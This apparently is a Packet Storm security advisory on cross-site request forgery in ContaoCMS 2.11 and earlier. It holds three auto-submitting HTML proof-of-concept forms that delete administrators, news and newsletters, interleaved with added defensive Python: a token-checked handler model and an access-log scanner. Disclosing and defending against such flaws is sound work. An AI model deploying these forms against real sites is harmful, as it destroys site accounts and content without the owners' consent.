ContaoCMS 2.11.0 Cross Site Request Forgery

2012-02-27T00:00:00
ID PACKETSTORM:110214
Type packetstorm
Reporter Ivano Binetti
Modified 2012-02-27T00:00:00

Description

                                        
+--------------------------------------------------------------------------------------------------------------------------------+  
# Exploit Title : ContaoCMS (fka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article)  
# Date : 25-02-2012  
# Author : Ivano Binetti (http://ivanobinetti.com)  
# Software link : http://www.contao.org/en/download.html  
# Vendor site : http://www.contao.org  
# Version : 2.11.0 (latest) and lower   
# Tested on : Debian Squeeze (6.0)   
+--------------------------------------------------------------------------------------------------------------------------------+  
+------------------------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------+  
  
Summary  
1)Introduction  
2)Vulnerabilities Description  
2.1 Delete Administrators or Users   
2.2 Delete News  
2.3 Delete Newsletter  
+--------------------------------------------------------------------------------------------------------------------------------+  
1)Introduction  
Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that  
is easy to maintain".  
  
2)Vulnerabilities Description  
Contao 2.11 (and lower) is affected by a CSRF vulnerability that allows an attacker to delete administrators or users and to delete   
site content (articles, news, newsletters and so on) when a logged-in back-end user visits a page carrying one of the forms below.  
  
2.1 Delete Administrators or Users  
<html>  
<body onload="javascript:document.forms[0].submit()">  
<H2>CSRF Exploit to delete ADMIN/USER account</H2>  
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=user&act=delete&id=2">  
</form>  
</body>  
</html>  
  
Note that it is possible to delete any admin or user, including the first administrator (id=1) created during Contao's installation.  
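The three proofs of concept in 2.1 to 2.3 all rely on the same weakness: the back end honours a POST to main.php?do=...&act=delete&id=... on the strength of the session cookie alone, and the victim's browser attaches that cookie to a cross-site form post automatically. The Python model below is an added example, not Contao's code: it places that unprotected handler beside a hardened version that requires a session-bound synchronizer token in the POST body (compared in constant time) and an Origin or Referer from the site's own origin. The site origin, the csrf_token field name, the attacker host and the in-memory record store are constructed assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import parse_qs, urlsplit

SITE_ORIGIN = "http://contao.example"  # constructed stand-in for the advisory's <contao_ip>

@dataclass
class Session:
    """Back-end session resolved from the session cookie."""
    is_admin: bool
    # Per-session synchronizer token: minted at login and embedded only in the
    # back end's own forms, so a cross-site page has no way to learn it.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))

@dataclass
class Request:
    method: str
    url: str
    form: dict       # POST body fields
    headers: dict    # Origin / Referer exactly as the browser sent them
    session: Optional[Session]

def make_store():
    """Constructed stand-in for the records behind do=user, do=news and do=newsletter."""
    return {"user": {1: "first admin", 2: "second admin"},
            "news": {1: "launch post"}, "newsletter": {1: "march issue"}}

def parse_action(url):
    """Split main.php?do=<module>&act=<action>&id=<n> into its three parts."""
    q = parse_qs(urlsplit(url).query)
    try:
        record_id = int(q.get("id", ["0"])[0])
    except ValueError:
        record_id = 0
    return q.get("do", [""])[0], q.get("act", [""])[0], record_id

def same_origin(url, expected):
    a, b = urlsplit(url), urlsplit(expected)
    return bool(url) and (a.scheme, a.netloc) == (b.scheme, b.netloc)

def is_admin_post(request):
    return request.method == "POST" and request.session is not None and request.session.is_admin

def perform_delete(request, store):
    """The destructive action itself, shared by both handlers below."""
    module, action, record_id = parse_action(request.url)
    if action != "delete" or module not in store:
        return False
    return store[module].pop(record_id, None) is not None

def delete_unprotected(request, store):
    """The pattern the advisory exploits: the session cookie is the only credential,
    so a cross-site form post from a logged-in admin's browser is honoured."""
    if not is_admin_post(request):
        return False
    return perform_delete(request, store)

def delete_protected(request, store):
    """Hardened handler: the POST body must echo the session's token (checked in
    constant time) and the request must originate from the site itself."""
    if not is_admin_post(request):
        return False
    submitted = request.form.get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), request.session.csrf_token.encode()):
        return False
    source = request.headers.get("Origin") or request.headers.get("Referer", "")
    if not same_origin(source, SITE_ORIGIN):
        return False
    return perform_delete(request, store)

def cross_site_post(session, module, record_id):
    """What the advisory's auto-submitting form produces in a logged-in admin's
    browser: session cookie present, no token, Origin set to the attacker's page."""
    url = f"{SITE_ORIGIN}/contao/main.php?do={module}&act=delete&id={record_id}"
    return Request("POST", url, {}, {"Origin": "http://attacker.example"}, session)

def same_site_post(session, module, record_id):
    """The same action issued from the real back-end page, token included."""
    url = f"{SITE_ORIGIN}/contao/main.php?do={module}&act=delete&id={record_id}"
    return Request("POST", url, {"csrf_token": session.csrf_token}, {"Origin": SITE_ORIGIN}, session)

def demo():
    """Run each of the advisory's three delete actions against both handlers."""
    admin = Session(is_admin=True)
    results = {}
    for module, record_id in (("user", 2), ("news", 1), ("newsletter", 1)):
        results[(module, "unprotected")] = delete_unprotected(
            cross_site_post(admin, module, record_id), make_store())
        store = make_store()
        results[(module, "protected_csrf")] = delete_protected(
            cross_site_post(admin, module, record_id), store)
        results[(module, "protected_legit")] = delete_protected(
            same_site_post(admin, module, record_id), store)
    return results

if __name__ == "__main__":
    for key, deleted in demo().items():
        print(key, "deleted" if deleted else "rejected")
```

Running the script shows every cross-site post succeeding against the unprotected handler and failing against the protected one, while the token-bearing same-site post still deletes the record. The token check is the actual fix; the Origin/Referer comparison is defence in depth, since some clients strip those headers, which is why it rejects a missing header rather than treating it as trusted.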
  
2.2 Delete News  
<html>  
<body onload="javascript:document.forms[0].submit()">  
<H2>CSRF Exploit to delete News</H2>  
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=news&act=delete&id=1">  
</form>  
</body>  
</html>  
  
  
2.3 Delete Newsletter   
<html>  
<body onload="javascript:document.forms[0].submit()">  
<H2>CSRF Exploit to delete Newsletter</H2>  
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/contao/main.php?do=newsletter&act=delete&id=1">  
</form>  
</body>  
</html>  
+--------------------------------------------------------------------------------------------------------------------------------+  
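For a site that could not be patched immediately, the requests these forms generate leave a recognisable trace in the web server's access log: a POST to main.php with act=delete whose Referer is absent or names a foreign host. The following Python is an added example, not part of the advisory, that scans combined-format log lines for that pattern; the log lines, the site host and the field layout are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format: client, ident, user, [time], "request", status, bytes,
# "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample: the first two lines match the advisory's pattern, the last two
# are ordinary back-end traffic from an administrator working in the real interface.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Feb/2012:10:00:01 +0000] "POST /contao/main.php?do=user&act=delete&id=2 HTTP/1.1" 303 0 "http://attacker.example/csrf.html" "Mozilla/5.0"
192.0.2.11 - - [25/Feb/2012:10:02:17 +0000] "POST /contao/main.php?do=news&act=delete&id=1 HTTP/1.1" 303 0 "-" "Mozilla/5.0"
192.0.2.12 - - [25/Feb/2012:10:05:42 +0000] "POST /contao/main.php?do=user&act=delete&id=3 HTTP/1.1" 303 0 "http://contao.example/contao/main.php?do=user" "Mozilla/5.0"
192.0.2.12 - - [25/Feb/2012:10:06:00 +0000] "GET /contao/main.php?do=user HTTP/1.1" 200 5120 "http://contao.example/contao/main.php" "Mozilla/5.0"
"""

def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_backend_delete(target):
    """True for main.php requests whose query string carries act=delete."""
    parts = urlsplit(target)
    if not parts.path.endswith("/main.php"):
        return False
    return parse_qs(parts.query).get("act", [""])[0] == "delete"

def classify_referer(referer, site_host):
    """'missing' if the browser sent none, 'foreign' if it names another host, else 'same-site'."""
    if referer in ("", "-"):
        return "missing"
    return "same-site" if urlsplit(referer).hostname == site_host else "foreign"

def find_suspicious_deletes(log_text, site_host):
    """Collect destructive back-end POSTs whose Referer is absent or off-site."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or not is_backend_delete(rec["target"]):
            continue
        verdict = classify_referer(rec["referer"], site_host)
        if verdict == "same-site":
            continue
        q = parse_qs(urlsplit(rec["target"]).query)
        hits.append({"ip": rec["ip"], "time": rec["ts"],
                     "module": q.get("do", [""])[0], "id": q.get("id", [""])[0],
                     "referer": rec["referer"], "reason": verdict})
    return hits

if __name__ == "__main__":
    for hit in find_suspicious_deletes(SAMPLE_LOG, "contao.example"):
        print(hit)
```

A foreign Referer on a delete action is a strong indicator; a missing one is weaker, because privacy extensions and referrer policies strip the header for legitimate users too, so the "missing" hits are a triage queue to correlate with the back end's own record of who was logged in from that address, not proof of an attack.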
  